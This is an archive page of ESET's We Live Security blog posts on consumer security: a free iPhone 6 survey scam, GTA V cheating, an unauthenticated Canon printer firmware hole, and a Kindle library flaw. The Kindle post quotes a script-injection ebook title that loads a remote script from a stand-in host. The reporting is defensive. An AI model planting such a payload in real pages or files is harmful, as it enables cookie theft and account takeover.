Category Archives: ESET

How to change Safari’s default search engine in iOS 8 for greater privacy

With iOS 8, you can – for the first time – switch your Safari browser’s search engine to alternatives such as DuckDuckGo. Find out why you might want to and, in fairness, why you might NOT want to…

The post How to change Safari’s default search engine in iOS 8 for greater privacy appeared first on We Live Security.

How to make your social media accounts (almost) unhackable

Now more than ever, it’s important to make sure your social media accounts are safe and secure. Here are our 6 top tips to make your social media accounts almost unhackable.

The post How to make your social media accounts (almost) unhackable appeared first on We Live Security.

Free iPhone 6 Facebook scam does the rounds, right on time

Facebook scams tend to crop up in the run-up to a big Apple launch with around the same regularity as big Apple launches themselves. This week’s iPhone 6 launch is no exception, with Help Net Security noting that a Facebook page ‘offering’ free iPhone 6 units is, as usual, a total fraud.

This time, the scam promises a free iPhone 6 as soon as “three easy steps” are completed, which, as usual, involve a survey, which allows you to download a “participation application.”

When a victim completes the free iPhone 6 survey, all their friends are spammed with the fake promotion, Hoax Slayer reveals, but the three “easy” steps are anything but.

Each time someone completes a survey, the page claims there is an error, and they are directed to a further survey, according to Help Net. As always, the “free iPhone 6” never materializes.

Free iPhone 6: Nope, it’s a scam

“Some of the available surveys want you to provide your mobile phone number, ostensibly to go in the draw for extra prizes or offers. But, by submitting your number, you will actually be subscribing to a very expensive text messaging ‘service’ that will charge you several dollars every time they send you a message,” Hoax Slayer says.

“Alternatively, you may be asked to provide your name, address, and phone details, again, to supposedly enter you into a prize draw. But, fine print on the page will state that your details will be shared with third-party marketers. Thus, after submitting your details, you will likely be inundated with annoying phone calls, emails, and junk mail.”

“Meanwhile, the scammer who created the fake promotion will earn a commission. But, no matter how many surveys you complete, you will still not get to download your ‘application’.”

The site cautions against clicking on any link this week which offers a free iPhone 6, as this sort of big product launch is a prime target for cybercriminals, and any link is potentially suspect.

Something for free?

Mark James, ESET security specialist, says, “We all like the idea of something for free, that’s the approach these types of scams use. Deep down we know it’s not going to happen, but a lot of people will still click the like button or share that simple post in the hope it’s going to arrive.”

“We have seen these types of scams for years but they are still as effective today as they were when started, once we like or share the page we do all the marketing and advertising for the scammers thus providing a very valuable and potentially dangerous page to initiate future scams or attacks.”

“I still encourage people to use the “front door” policy, i.e. treat it like your front door: ‘When was the last time someone banged on your front door to offer you an iPhone 5 or 6 just for filling out a survey or a £10/£50 supermarket voucher for free?’ It just does not happen.”

The post Free iPhone 6 Facebook scam does the rounds, right on time appeared first on We Live Security.

GTA V hacks warning as gamers ‘lose millions’ in online games

Gamers have reported losing millions of dollars to hackers running customized software which allows them to steal weapons, loot money, and even make people blow up in their own apartments, according to prominent Grand Theft Auto V YouTube reporter DomIsLive, who devoted an issue of his daily show to GTA V hacks this month.

Yahoo News reports that multiple players have been affected by glitches in online games, described variously as “unfairly modded”, i.e. using in-game tools, or simply as “hacked”.

DomIsLive, who has nearly half a million subscribers on YouTube, says that several of his subscribers reported losing “millions” in online games which had seemingly been hacked.

On Rockstar’s forums, various gamers complain about having lost large sums of in-game currency to similar GTA V hacks. DomIsLive claims to have seen multiple threads on the forums relating to the same or similar hacks.

GTA V hacks: Losing millions?

ESET Distinguished Researcher Aryeh Goretsky looks in detail at the blurred lines between cheating and crime in an extended blog post on We Live Security, saying, “Computer gaming is a huge and a wildly successful market, and as in any system that works at scale, there are going to be so-called businessmen or entrepreneurs who “seek to optimize their return on investment through whatever means possible” or, to put it more succinctly, criminals who abuse the ecosystem.”

It appears GTA V’s online game system is not exempt.

In one screenshot posted on DomIsLive’s channel, a gamer complains, “Dear Rockstar, I have just been robbed of my weapons by an unfair modder. He stole my weapons, causing me to pay around 1,000,000 and I earned it fair and square, and I wondered if I could get my money back because I’m extremely frustrated.”

‘Rockstar may not reimburse money’

A Rockstar games representative replies, saying that the team will investigate, but warning that, “Rockstar will definitely look into this, however they may not be able to reimburse you with weapons and/or GTA dollars.”

It’s unclear whether one specific GTA V hack is responsible, or a multitude of methods. DomIsLive advises his subscribers, “Losing their money in public sessions, I advise you to stay out of public sessions and stick to private sessions with this friend. If you see something strange happening, and if you see someone dropping their money, leave that lobby now.”

Responses from his subscribers seem to indicate that the problem is worse on Xbox 360 than on PlayStation 3. One poster says, “On Xbox it seems like every 20 sessions you join, you find one [a hacker]. On the PS3 I haven’t found that many, and from what people have told me, it’s because there aren’t that many.”

The post GTA V hacks warning as gamers ‘lose millions’ in online games appeared first on We Live Security.

Is your business prepared to continue? Watch now and get started with BCM

Business continuity is a term that can sound strange the first time you hear it; after all, you probably have every intention of being in business for the long haul. Right now you may be preparing the 2015 sales forecast and budget, with hopes for a great year ahead. But in your planning, have you thought about how your business would handle the bad things that can happen, from a computer virus outbreak to a biological virus outbreak, and all the other perils in-between, like fires, floods, tornadoes, hurricanes, earthquakes, and tsunamis?

Putting a plan in place to survive such “adverse events” is the goal of business continuity management or BCM, and it could well be the key to securing your digital future. Here is a 50-minute webinar that I recorded on this topic earlier this year. If you want to get a handle on planning for the future of your business, take a listen:

The post Is your business prepared to continue? Watch now and get started with BCM appeared first on We Live Security.

Printer security: Canon offers ‘fix’ after researcher plays Doom

Printer giant Canon is to provide a security fix “as quickly as is feasible” after a researcher exploited vulnerabilities in one of its wireless PIXMA products to run the classic shoot ‘em up game Doom on its colour display.

Security researcher Michael Jordon told the BBC in an interview, “Running Doom: that’s real proof you control the thing. The web interface has no username and password on it.”

Digital Trends said that the vulnerability, which allows access to printer controls via an unsecured web page, highlighted the problems not just of printer security, but of the entire emerging “internet of things.”

Canon said that all new products would have a fix added as soon as possible, and that the fix would retroactively apply to products launched from 2013 onwards.

“At Canon we work hard at securing all of our products, however with diverse and ever-changing security threats we welcome input from others to ensure our customers are as well protected as possible,” the firm said.

Printer security: Deeper worries?

A search using Shodan (a specialist search engine which finds specific types of devices connected to the internet) revealed thousands of unsecured machines connected directly to the internet.

“This interface does not require user authentication allowing anyone to connect to the interface. At first glance the functionality seems to be relatively benign, you could print out hundreds of test pages and use up all the ink and paper, so what?” Jordon writes.

He said that the problems (and the opportunity to run Doom) arise when the online interface is used to update the firmware, which raises serious printer security issues.

Persuading the printer to run Doom took “months”, he admits, but the issue is a serious one. Even printers not directly connected to the internet can fall victim, he said, if their owners are persuaded to click on a bogus link.

Vulnerable to remote attack

Jordon writes, “Even if the printer is not directly accessible from the Internet, for example behind a NAT on a user’s home network or on an office intranet, the printer is still vulnerable to remote attack.”

“A colleague (thanks Paul Stone) demonstrated this by making a web page that first scans the local network for vulnerable printers (using a technique called JavaScript port scanning). Once the printer’s IP address has been found, the web page sends a request to the web interface to modify the proxy configuration and trigger a firmware update.”

The post Printer security: Canon offers ‘fix’ after researcher plays Doom appeared first on We Live Security.

Free ebooks warning: Pirates ‘can hack into Amazon accounts’

Pirating ebooks is not just bad for the publishing industry: free ebooks available online can also be used to hack into Amazon accounts via the retail giant’s ‘Manage Your Kindle’ page, used to deliver ebook files to Kindle Readers, according to researcher Benjamin Daniel Mussler.

Mussler writes that simply changing the title of the free ebooks allows attackers to execute code when a victim opens the ‘Kindle Library’ page in a web browser, The Digital Reader reports.

“As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised,” Mussler writes.

Engadget reports that Mussler discovered the security issue last October, and the company rapidly patched it. It was reintroduced, however, when the company launched a new version of the “Manage Your Kindle” web page.

Free ebooks: a threat?

Mussler writes that the threat affects, “Everyone who uses Amazon’s Kindle Library,” but stresses that the flaw affects those who pirate free ebooks in particular.

The attack takes place, he writes, “Once an attacker manages to have an e-book (file, document, …) with a title like <script src="https://www.example.org/script.js"></script> added to the victim’s library.”

Mussler says, “Users most likely to fall victim to this vulnerability are those who obtain e-books from untrustworthy sources (read: pirated e-books) and then use Amazon’s “Send to Kindle” service to have them delivered to their Kindle. From the supplier’s point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts.”

Kindle users beware

The reappearance of the flaw was highlighted by the German ebook blog Alles Book. The site also produced a proof-of-concept ebook download to demonstrate that it worked. As of the time of writing, the flaw is still active, Mussler reports.

Mussler says, “Amazon chose not to respond to my subsequent email detailing the issue, and two months later, the vulnerability remains unfixed.”

The post Free ebooks warning: Pirates ‘can hack into Amazon accounts’ appeared first on We Live Security.